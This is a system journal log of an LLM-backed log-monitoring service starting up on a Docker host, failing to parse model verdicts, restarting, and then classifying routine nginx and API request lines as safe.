Mar 19 22:22:13 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842060 [observer] VaultGuardian Observer starting...
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842125 [observer] Normalizer registry initialized
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842184 [observer] Pattern store initialized (0 scopes)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842191 [observer] Analyzer pipeline ready
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842333 [notifier] Generated default config at /var/lib/observer/notifications.yaml
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842646 [logwatch] Notifications:
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842653 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842658 [logwatch]   ✗ email      → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842661 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842664 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842668 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842671 [observer] No notification channels configured — alerts will be logged to stdout only
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.842829 [observer] Starting container log watcher...
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891246 [watcher] Found 8 running containers
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891296 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891403 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891421 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891484 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891494 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891567 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891582 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:22:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:13.891629 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:22:14 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:14.347451 [observer] LLM inference server connected
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807924 [llm] Failed to parse verdict from:
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807960 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:24.807969 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:14.623220640Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081033 [llm] Failed to parse verdict from:
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081071 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:27 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:27.081079 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:14.624487274Z 98.152.173.124 - - [19/Mar/2026:22:22:14 +0000] "captain.admin.kovicl...
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585944 [llm] Failed to parse verdict from:
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585981 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:35 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:35.585995 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:17.598695335Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422482 [llm] Failed to parse verdict from:
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422516 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:38.422525 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:17.598449224Z 98.152.173.124 - - [19/Mar/2026:22:22:17 +0000] "captain.admin.kovicl...
Mar 19 22:22:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:43.844667 [observer] Pipeline: processed=6 pattern_hits=0 llm_calls=6 llm_errors=4 learned=0
Mar 19 22:22:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:43.844692 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154651 [llm] Failed to parse verdict from:
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154684 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:46 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:46.154693 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:20.596600476Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470486 [llm] Failed to parse verdict from:
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470528 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:22:50 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:50.470556 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:20.596560565Z 98.152.173.124 - - [19/Mar/2026:22:22:20 +0000] "captain.admin.kovicl...
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084249 [llm] Failed to parse verdict from:
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084296 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:22:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:22:58.084305 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:23.585019736Z GET /api/v2/user/apps/appData/api 304 1.852 ms - -
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827624 [llm] Failed to parse verdict from:
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827665 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:01 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:01.827674 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:23.585287599Z 98.152.173.124 - - [19/Mar/2026:22:22:23 +0000] "captain.admin.kovicl...
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673829 [llm] Failed to parse verdict from:
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673861 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:07 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:07.673870 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:23.609128033Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797363 [llm] Failed to parse verdict from:
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797403 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:12 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:12.797412 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:23.609215590Z 98.152.173.124 - - [19/Mar/2026:22:22:23 +0000] "captain.admin.kovicl...
Mar 19 22:23:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:13.844662 [observer] Pipeline: processed=12 pattern_hits=0 llm_calls=12 llm_errors=10 learned=0
Mar 19 22:23:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:13.844686 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=12
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405523 [llm] Failed to parse verdict from:
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405556 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:17 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:17.405564 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:26.596071430Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305237 [llm] Failed to parse verdict from:
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305273 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:24.305282 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:26.596151066Z 98.152.173.124 - - [19/Mar/2026:22:22:26 +0000] "captain.admin.kovicl...
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586447 [llm] Failed to parse verdict from:
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586499 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:28 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:28.586509 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:29.601912382Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983759 [llm] Failed to parse verdict from:
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983793 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:34.983802 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:29.602230983Z 98.152.173.124 - - [19/Mar/2026:22:22:29 +0000] "captain.admin.kovicl...
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918266 [llm] Failed to parse verdict from:
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918317 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:38 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:38.918327 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:32.597046465Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:43.846522 [observer] Pipeline: processed=17 pattern_hits=0 llm_calls=17 llm_errors=15 learned=0
Mar 19 22:23:43 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:43.846547 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=17
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121504 [llm] Failed to parse verdict from:
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121552 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:47 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:47.121561 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:32.207065844Z 54.200.221.0 - - [19/Mar/2026:22:22:32 +0000] "captain.admin.koviclou...
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513231 [llm] Failed to parse verdict from:
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513269 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:23:49 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:49.513286 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:35.612384240Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698053 [llm] Failed to parse verdict from:
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698091 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:23:58 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:23:58.698100 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:32.597244232Z 98.152.173.124 - - [19/Mar/2026:22:22:32 +0000] "captain.admin.kovicl...
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607082 [llm] Failed to parse verdict from:
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607112 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:00 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:00.607121 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:38.604206059Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836535 [llm] Failed to parse verdict from:
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836571 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:09 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:09.836581 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:33.207372020Z 54.200.221.0 - - [19/Mar/2026:22:22:33 +0000] "captain.admin.koviclou...
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023397 [llm] Failed to parse verdict from:
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023428 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.023436 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:41.603260101Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.844504 [observer] Pipeline: processed=23 pattern_hits=0 llm_calls=23 llm_errors=21 learned=0
Mar 19 22:24:13 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:13.844525 [observer] Patterns: hash=0 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=23
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104611 [llm] Failed to parse verdict from:
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104658 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:21 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:21.104666 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:35.612627471Z 98.152.173.124 - - [19/Mar/2026:22:22:35 +0000] "captain.admin.kovicl...
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203738 [llm] Failed to parse verdict from:
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203783 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:24 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:24.203793 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:44.593995609Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905308 [llm] Failed to parse verdict from:
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905353 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: unexpected end of JSON input
Mar 19 22:24:30 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:30.905363 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:47.589386039Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009199 [llm] Failed to parse verdict from:
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009235 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 22:24:34 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:34.009245 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:38.604137431Z 98.152.173.124 - - [19/Mar/2026:22:22:38 +0000] "captain.admin.kovicl...
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Stopping VaultGuardian Observer...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138644 [observer] Shutting down...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138857 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138867 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:22:41.602999460Z 98.152.173.124 - - [19/Mar/2026:22:22:41 +0000] "captain.admin.kovicl...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138914 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: LLM request failed: Post "https://api.openai.com/v1/chat/completions": context canceled
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.138920 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:22:50.598703347Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.139278 [observer] Final stats: processed=27 pattern_hits=0 llm_calls=27 learned=0
Mar 19 22:24:36 ip-172-26-12-110 observer[1561805]: 2026/03/19 22:24:36.139286 [observer] Shutdown complete
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: observer.service: Deactivated successfully.
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Stopped VaultGuardian Observer.
Mar 19 22:24:36 ip-172-26-12-110 systemd[1]: Started VaultGuardian Observer.
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157467 [observer] VaultGuardian Observer starting...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157516 [observer] Normalizer registry initialized
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157932 [observer] Pattern store initialized (0 scopes)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.157944 [observer] Analyzer pipeline ready
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158208 [logwatch] Notifications:
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158217 [logwatch]   ✗ webhook    → not configured (set WEBHOOK_URL)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158222 [logwatch]   ✗ email      → not configured (set RESEND_API_KEY + ALERT_EMAIL_TO)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158225 [logwatch]   ✗ sms        → not configured (set TWILIO_SID + ALERT_SMS_TO)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158227 [logwatch]   ✗ push/ios   → not configured (set APNS_KEY_PATH + APNS_DEVICE_TOKEN)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158230 [logwatch]   ✗ push/fcm   → not configured (set FCM_CREDENTIALS_PATH + FCM_DEVICE_TOKEN)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158233 [observer] No notification channels configured — alerts will be logged to stdout only
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.158492 [observer] Starting container log watcher...
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163077 [watcher] Found 8 running containers
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163147 [watcher] Streaming logs for srv-captain--login.1.z0hqzqv52lp5zsxguujh9vvsp (0fd7725d4d5c)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163255 [watcher] Streaming logs for srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp (e9fbb6ab33ae)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163312 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163329 [watcher] Streaming logs for srv-captain--media.1.td1ofal2g3beoqwzjiemvmuo4 (91c0395873e8)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163379 [watcher] Streaming logs for captain-certbot.1.by454lfepw5mkzfa8e3karl8p (e1aa25883517)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163394 [watcher] Streaming logs for captain-netdata-container (974270844dff)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163458 [watcher] Streaming logs for captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo (9d722e5b66d0)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.163543 [watcher] Streaming logs for srv-captain--media-api.1.8iw1rx1hsebohsltxip133ftf (73fec0bbd4c4)
Mar 19 22:24:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:36.506717 [observer] LLM inference server connected
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.788265 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.788326 [analyzer] Source hint mismatch: LLM says "docker web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.823448 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.86 action=allow pattern_type=contains
Mar 19 22:24:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:39.823485 [analyzer] Source hint mismatch: LLM says "nginx (docker container: captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.577539 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.577628 [analyzer] Source hint mismatch: LLM says "nginx access log inside docker (captain-nginx)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.683319 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:24:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:42.683359 [analyzer] Source hint mismatch: LLM says "docker containerized web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:45.926276 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:24:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:45.926312 [analyzer] Source hint mismatch: LLM says "docker container access logs / app HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:24:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:24:48.825238 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
